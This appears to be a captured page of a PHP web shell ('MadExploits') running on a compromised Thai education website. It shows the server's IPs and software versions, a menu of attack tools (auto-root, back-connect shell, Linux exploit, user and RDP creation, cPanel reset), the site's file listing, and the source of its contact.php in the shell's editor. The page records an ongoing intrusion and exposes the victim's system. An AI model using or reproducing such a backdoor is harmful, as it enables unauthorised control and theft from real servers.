Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 3.21.122.130
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
myeducation.co.th /
[ HOME SHELL ]
Name
Size
Permission
Action
Structure
[ DIR ]
drwxr-xr-x
UserFiles
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
1Head.php
8.88
KB
-rw-r--r--
2HeadMenu.php
2.27
KB
-rw-r--r--
2banner.php
105
B
-rw-r--r--
2banner_mo.php
9.16
KB
-rw-r--r--
2banner_pc.php
3.81
KB
-rw-r--r--
3Footer.php
227
B
-rw-r--r--
4End.php
1.39
KB
-rw-r--r--
about.php
3.46
KB
-rw-r--r--
banner_next_country.php
3.1
KB
-rw-r--r--
banner_next_student_reviews.ph...
3.13
KB
-rw-r--r--
call_contact_mo.php
16.06
KB
-rw-r--r--
call_contact_pc.php
4.2
KB
-rw-r--r--
city.php
7.28
KB
-rw-r--r--
contact.php
5.92
KB
-rw-r--r--
country.php
5.72
KB
-rw-r--r--
detail.php
284
B
-rw-r--r--
detail_gallery.php
4.28
KB
-rw-r--r--
detail_mo.php
39.4
KB
-rw-r--r--
detail_promotion.php
3.01
KB
-rw-r--r--
detail_student_reviews.php
2.89
KB
-rw-r--r--
detail_tip.php
3.56
KB
-rw-r--r--
footer_mo.php
6.66
KB
-rw-r--r--
footer_pc.php
6.79
KB
-rw-r--r--
gallery.php
7.37
KB
-rw-r--r--
head_footer_3.php
3.59
KB
-rw-r--r--
hotpromotion.php
6.83
KB
-rw-r--r--
index.php
171
B
-rw-r--r--
index_country.php
121
B
-rw-r--r--
index_country_mo.php
4.38
KB
-rw-r--r--
index_country_pc.php
4
KB
-rw-r--r--
index_gallery.php
9.77
KB
-rw-r--r--
index_hot_promotion.php
9.2
KB
-rw-r--r--
index_student_reviews.php
9.87
KB
-rw-r--r--
index_video.php
4.54
KB
-rw-r--r--
shool.php
4.71
KB
-rw-r--r--
student_reviews.php
6.77
KB
-rw-r--r--
tip.php
7.84
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : contact.php
<?PHP include '1Head.php'; include '2HeadMenu.php'; include '2banner.php'; ?> <div class="main-content"> <!-- Section: Blog --> <section> <div class="container" style="padding: 40px;"> <div class="comment-box"> <?PHP $HomeID = '115'; $SQL_Home = " SELECT home.Home_ID, home.Member_ID, member.Member_NameEN, member.Position_ID, position.Position_Name, home.Home_Date, home.Home_Time, home.Home_Visitors, home.Home_Sub, home.Home_Short,home.Home_Short2,home.Home_Short3, home.Home_Detail, home.Home_Category, home.StatusHome_ID, status_home.StatusHome_Name, home.StatusShowPage_ID, status_showpage.StatusShowPage_Name FROM status_showpage INNER JOIN (status_home INNER JOIN (position INNER JOIN (member INNER JOIN home ON member.Member_ID = home.Member_ID) ON position.Position_ID = member.Position_ID) ON status_home.StatusHome_ID = home.StatusHome_ID) ON status_showpage.StatusShowPage_ID = home.StatusShowPage_ID WHERE home.StatusHome_ID = 1 AND home.StatusShowPage_ID = '$HomeID' ORDER BY home.Home_ID asc LIMIT 9 "; $objQuery_Home = $objConnect->query($SQL_Home); while ($objResult_Home = mysqli_fetch_array($objQuery_Home)) { $HomeID = $objResult_Home["Home_ID"]; $HomeSub = $objResult_Home["Home_Sub"]; $HomeShort = $objResult_Home["Home_Short"]; $HomeDetail = $objResult_Home["Home_Detail"]; $HomeShort2 = $objResult_Home["Home_Short2"]; $HomeShort3 = $objResult_Home["Home_Short3"]; $HomeDate = $objResult_Home["Home_Date"]; $StatusShowPageID = $objResult_Home["StatusShowPage_ID"]; $Home_Visitors = $objResult_Home["Home_Visitors"]; $date = date_create($HomeDate); $NewDate = date_format($date, "F d , Y"); $NewDate1 = date_format($date, "d"); $NewDate2 = date_format($date, "F"); // Show img only LIMIT 1 $SQL_Home_Img = " SELECT img_home.Home_ID, img_home.ImgHome_Img, img_home.ImgHome_Sort, img_home.StatusImgHome_ID FROM img_home WHERE img_home.Home_ID = $HomeID ORDER BY img_home.ImgHome_Sort ASC LIMIT 1 "; $objQuery_Home_Img = $objConnect->query($SQL_Home_Img); // พากหัว หลัก if ($HomeSub == "-") { $Check_HomeSub2 = ""; } else { $Check_HomeSub2 = $HomeSub; } //map if ($HomeShort == "-") { $Check_HomeShort2 = ""; } else { $Check_HomeShort2 = $HomeShort; } //เกริน if ($HomeDetail == "-") { $Check_HomeShort3 = ""; } else { $Check_HomeShort3 = $HomeShort2; } //เวลา if ($HomeDetail == "-") { $Check_HomeShort4 = ""; } else { $Check_HomeShort4 = $HomeShort3; } //รายละเอียด if ($HomeDetail == "-") { $Check_HomeDetai2 = ""; } else { $Check_HomeDetai2 = $HomeDetail; } $Detail = str_replace('http://myeducation.co.th/',"",$Check_HomeDetai2); ?> <h2 style="text-align: center;font-weight: bolder;"> <?= $Check_HomeSub2; ?></h2> <hr> <?= $Check_HomeShort2; ?> <hr> <div class="row"> <div class="col-sm-12"> <?= $Detail; ?> <?PHP } ?> <div class="panel panel-default" style="border: 0px solid #f9f9f9;"> <div class="panel-body" style="box-shadow: 0px 7px 16px 0px #dcdcdc;background: #f9f9f9;"> <hr> <h2 style="text-align: center;font-weight: bolder;color: #000867;">ฝากข้อความติดต่อเรา</h2> <div class="row"> <!-- <form role="form" id="comment-form"> --> <form role="form" id="comment-form" action="model/controller/contact_front_end_Add.php" method="POST"> <input type="text" name="Teb" value="Add" hidden="hidden" /> <input type="text" name="Per_ID" value="0" hidden="hidden" /> <input type="text" name="Form" value="AddImgsubcategory" hidden="hidden" /> <div class="col-sm-6 pt-0 pb-0"> <div class="form-group"> <input type="text" class="form-control" name="fname" placeholder="ชื่อ-สกุล" required> </div> <div class="form-group"> <input type="text" class="form-control" name="Tel" placeholder="โทรศัพท์" required> </div> <div class="form-group"> <input type="text" class="form-control" name="Email" placeholder="อีเมล์" required> </div> </div> <div class="col-sm-6"> <div class="form-group"> <input type="text" class="form-control" name="Subject" placeholder="เรื่อง" required> </div> <div class="form-group"> <textarea class="form-control" name="Message" placeholder="รายละเอียด" rows="4" required></textarea> </div> <div class="form-group"> <button type="submit" class="btn btn-dark btn-flat pull-right m-0" style="background: #e6e6e6;color: #0b1592;border-color: #e6e6e6;">ฝากข้อความ</button> </div> </div> </form> </div> </div> </div> </div> </div> </div> </div> </section> </div> <!-- end main-content --> <?PHP include '3Footer.php'; include '4End.php'; ?>
Close